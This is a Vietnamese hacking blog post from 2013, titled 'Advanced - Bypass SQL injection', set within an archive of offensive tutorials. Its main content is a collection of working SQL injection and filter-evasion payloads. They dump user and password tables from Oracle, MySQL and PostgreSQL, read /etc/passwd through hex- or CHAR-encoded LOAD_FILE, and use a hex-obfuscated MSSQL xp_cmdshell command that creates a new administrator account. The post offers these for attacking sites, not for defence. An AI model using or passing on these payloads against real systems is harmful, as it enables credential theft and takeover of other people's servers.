My Banner
Link Sahabat
Forum
- local attack (1)
- new (1)
- sql injection (36)
- tài liệu IT (1)
- Trick Blogger (1)
- Trick facebook (9)
Benner Friends
abc
Blog Archive
-
▼
2013
(50)
-
▼
tháng 12
(36)
- tut 406
- tut ko có use và admin
- tut check sql sài lệnh mid 100,1000(sql nang cao)
- tut xpath (sql nang cao)
- tut thêm =-1148952776'
- tut SQL injection dạng HTML
- Một số cách kiếm acc facebook
- Hướng dẫn cách lấy toàn bộ bài viết từ blog khác
- các lệnh local
- Khai thác Error Based - Quick Blind
- MỘT SỐ LƯU Ý KHI KHAI THÁC SQL
- các dạng tut check sql
- Một số cách Bypass SQL injection
- [TUT] Hack SQLi Injection Căn Bản Cho NewBie
- [TUT] Hack SQLi Injection Căn Bản Cho NewBie
- Từ dễ đến khó "Bypass WAF"
- [TUT] Bypass Filter + 403 Forbidden SQL Injection
- Advanced - Jet SQL
- Advanced - Blind SQL
- Advanced - Blind SQL
- Advanced - Group by,Order by,Limit
- Advanced - Bypass SQL injection
- Advanced - Bypass SQL injection
- Advanced - Blind SQL
- Advanced - MySQL Blind SQL Cheat Sheets
- Basic - MySQL injection
- Basic - lỗi SQL id=?' cat=?' - part 2
- Basic - lỗi SQL id=?' cat=?' Tìm Shop lỗi
- Basic - lỗi SQL id=?' cat=?' Tìm Shop lỗi
- Basic - Unable to run Query
- tut hướng dẫn check sql bang html
- tổng hợp các link hack site
- Tut SQL Base64 encode/decode
- TUT ko co user va admin tim kiem member
- --------------error base------------
- tut tb_user
-
▼
tháng 12
(36)
Được tạo bởi Blogger.
Translate
Chủ Nhật, 22 tháng 12, 2013
Advanced - Bypass SQL injection
Ví dụ :
Code:
"SELECT name, surname FROM users WHERE
name='" . $_GET['name'] . "'"
Ta có thể by pass bằng back-end DBMS
Code:
SELECT name, surname FROM users WHERE
name='foobar\' OR 10>4--'
Exploit với câu lệnh Union
Code:
SELECT name, surname FROM users WHERE
name='foobar\' UNION ALL SELECT NAME,
PASSWORD FROM SYS.USER$--'
Boolean-based blind SQL injection exploit
Code:
SELECT name, surname FROM users WHERE
name='foobar\' OR ASCII(SUBSTR((SQL
query), Nth SQL query output char, 1))
> Bisection algorithm number--'
By pass qua lênh load_file
Code:
LOAD_FILE('/etc/passwd')
biến đổi như sau
Code:
LOAD_FILE(CHAR(47,101,116,99,47,112,97,
115,115,119,100))
hoặc
Code:
LOAD_FILE(0x2f6574632f706173737764)
Trong các web asp ta có thể dùng phương pháp back-end DBMS
vd:
Code:
SELECT pg_sleep(3)
thành
Code:
S%ELEC%T %p%g_sle%ep(%3)
Bypass bằng phương pháp hex đối với MSSQL
vd:
Code:
exec master..xp_cmdshell 'NET USER myuser
mypass /ADD & NET LOCALGROUP
Administrators myuser /ADD'
thành
Code:
DECLARE @rand varchar(8000) SET @rand =
0x65786563206d61737465722e2e78705f636d6473
68656c6c20274e45542055534552206d7975736572
206d7970617373202f4144442026204e4554204c4f
43414c47524f55502041646d696e6973747261746f
7273206d7975736572202f41444427; EXEC
(@rand)
ByPass bằng các dấu comment trong mysql
vd :
Code:
SELECT user, password FROM mysql.user
thành
Code:
SELECT/*R_aNd*/user/*rA.Nd*/,/*Ran|D
*/password/*r+anD*/FROM/*rAn,D*/mysq
l.user
Bypass by random URI encoded payload
vd:đối với hệ quản trị PostgreSQL
Code:
SELECT schemaname FROM pg_tables
thành
Code:
%53E%4c%45%43T%20%73%63h%65%6d%61%6e
a%6de%20%46%52O%4d%20%70g%5f%74a%62%
6ce%73
Bypass với các câu select đơn
vd:
Code:
SELECT user, password FROM mysql.user
thành
Code:
SELECT GROUP_CONCAT(CONCAT(user, 'RaND',
password)) FROM mysql.user
hoặc sử dụng unhex(hex(trường cần lấy))
Code:
unhex(hex(username))
Bypass với các trường hợp column bị giới hạn
vd:đối với
Code:
SELECT usename, passwd FROM pg_shadow
thành
Code:
UNION ALL SELECT,
CHR(109)||CHR(107)||CHR(100)||CHR(83)||CHR
(68)||CHR(111)||COALESCE(CAST(usename AS
CHARACTER(10000)),
CHR(32))||CHR(80)||CHR(121)||CHR(80)||CHR(
121)||CHR(66)||CHR(109)||COALESCE(CAST(pas
swd AS CHARACTER(10000)),
CHR(32))||CHR(104)||CHR(108)||CHR(74)||CHR
(103)||CHR(107)||CHR(90), FROM pg_shadow--
Nhãn:
sql injection
Đăng ký:
Đăng Nhận xét (Atom)
Giới thiệu bản thân
Join My Group
webcom
Translators
Statistik
Follow
noo
no
Gunakan Google Chrome Untuk Mendapatkan Tampilan Terbaik Blog Ini ( ^_^ )